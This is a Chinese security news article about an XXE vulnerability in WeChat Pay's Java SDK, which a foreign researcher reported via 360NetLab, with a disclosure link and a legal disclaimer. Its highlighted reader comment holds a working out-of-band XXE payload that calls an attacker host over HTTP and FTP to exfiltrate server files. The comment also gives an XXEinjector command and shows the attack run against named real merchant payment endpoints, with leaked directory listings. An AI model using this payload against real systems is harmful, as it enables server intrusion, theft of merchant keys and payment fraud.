快讯 | 发现微信支付的重大漏洞,国外白帽子竟然先联系了360?

2018-07-03 403463人围观 ,发现 10 个不明物体 资讯

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

随着微信支付逐渐向海外市场普及,越来越多的外国友人及店铺开始使用微信支付。不过却发生了一件有趣的事情,国外一名白帽子发现了微信支付的漏洞,但却不知道如何联系微信安全的人员,竟然在Twitter上@360NetLab。在360安全人员转达漏洞之后,微信安全团队已经及时跟进处理这个问题。目测,下一波“微信致谢360”不远了……

TIM截图20180703111929.png根据白帽子给出的漏洞描述,使用微信支付时,商家需要提供通知网址以接受异步支付结果。 问题是微信在JAVA版本SDK中的实现存在一个xxe漏洞。 攻击者可以向通知URL构建恶意payload,根据需要窃取商家服务器的任何信息。 一旦攻击者获得商家的关键安全密钥(md5-key和merchant-Id等),就可以通过发送伪造信息来欺骗商家购买任何东西而无需付费。

微信可以通过更新sdk修复问题,但是商家修复漏洞则需要时间和经验。

TIM截图20180703113941.png也许是360安全团队在国外更加知名,发现微信支付漏洞之后,该白帽子却不知如何联系微信安全团队,无奈只能在Twitter上@360NetLab。360的安全人员也在得知消息之后告知微信团队,很快我们也在白帽Twitter 的推文下看到了微信安全团队的回复,表示“已经在紧急跟进这个问题”。

有关漏洞详情及演示过程,可点击链接查看:http://seclists.org/fulldisclosure/2018/Jul/3

*本文作者:Andy.i,转载请注明来自FreeBuf.COM

相关推荐

这些评论亮了

  • flagellantX (4级) 在路上点滴挪步,不骄不躁,极度讨厌恃强凌弱欺负菜鸟的人格障碍... 回复
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE root [
    <!ENTITY % attack SYSTEM "file:///etc/">
    <!ENTITY % xxe SYSTEM "http://attacker:8080/shell/data.dtd">
    %xxe;
    ]>

    data.dtd:

    <!ENTITY % shell "<!ENTITY % upload SYSTEM 'ftp://attack:33/%attack;
    '>">
    %shell;
    %upload;

    or use XXEinjector tool ahttps://github.com/enjoiz/XXEinjectora

    ruby XXEinjector.rb --host=attacker --path=/etc --file=req.txt --ssl

    req.txt :
    POST merchant_notification_url HTTP/1.1
    Host: merchant_notification_url_host
    User-Agent: curl/7.43.0
    Accept: */*
    Content-Length: 57
    Content-Type: application/x-www-form-urlencoded

    XXEINJECT


    In order to prove this, I got 2 chinese famous company:
    aamomo: Well-known chat tools like WeChat
    bavivo i1/4China's famous mobile phone,that also famous in my country

    Example momo :
    attack:
    notify url: https://pay.immomo.com/weixin/notify
    cmd: /home/

    result:

    ***
    logs
    zhang.jiax**
    zhang.shaol**
    zhang.xia**
    ****

    attack:
    notify url: https://pay.immomo.com/weixin/notify
    cmd: /home/logs

    result:
    ***
    moa-service
    momotrace
    ****

    Example vivo :
    attack:
    notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo
    cmd: /home/

    result:
    tomcat

    attack:
    notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo
    cmd: /home/tomcat
    result:
    .bash_logout
    .bash_profile
    .bashrc
    logs

    attack:
    notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo
    cmd: /home/tomcat/logs
    result:
    ****
    tomcat-2018-06-28.log
    tomcat-2018-06-29.log
    tomcat-2018-06-30.log
    )36( 亮了
  • heiheihaha 回复
    外国友人。。。用中文标点的外国友人?
    )12( 亮了
发表评论

已有 10 条评论

取消
Loading...

特别推荐

推荐关注

活动预告

填写个人信息

姓名
电话
邮箱
公司
行业
职位
css.php